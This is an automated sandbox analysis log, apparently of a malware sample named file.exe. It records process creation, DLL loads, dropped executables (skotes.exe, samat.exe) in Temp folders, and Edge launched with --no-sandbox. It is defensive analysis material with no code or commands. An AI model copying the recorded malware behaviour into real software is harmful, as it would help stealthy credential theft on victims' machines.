Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: pywintypes313.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxdiagn.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d12.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devobj.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmmbase.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wmiclnt.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: userenv.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: profapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dsound.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devrtl.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: spinf.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: drvstore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: spfileq.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wifidisplay.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mmdevapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfplat.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: rtworkq.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mf.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ksuser.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mfsensorgroup.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: comppkgsup.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.media.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dispbroker.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d12core.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dxilconv.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3dscache.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: mscat32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ddraw.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dciman32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: avrt.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: audioses.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msacm32.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: midimap.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dinput8.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: hid.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: inputhost.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: propsys.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: devenum.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: quartz.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: elstrans.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1927680 > 1048576
Source: file.exe Static PE information: Raw size of fjmpujlc is bigger than: 0x100000 < 0x1a4c00
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
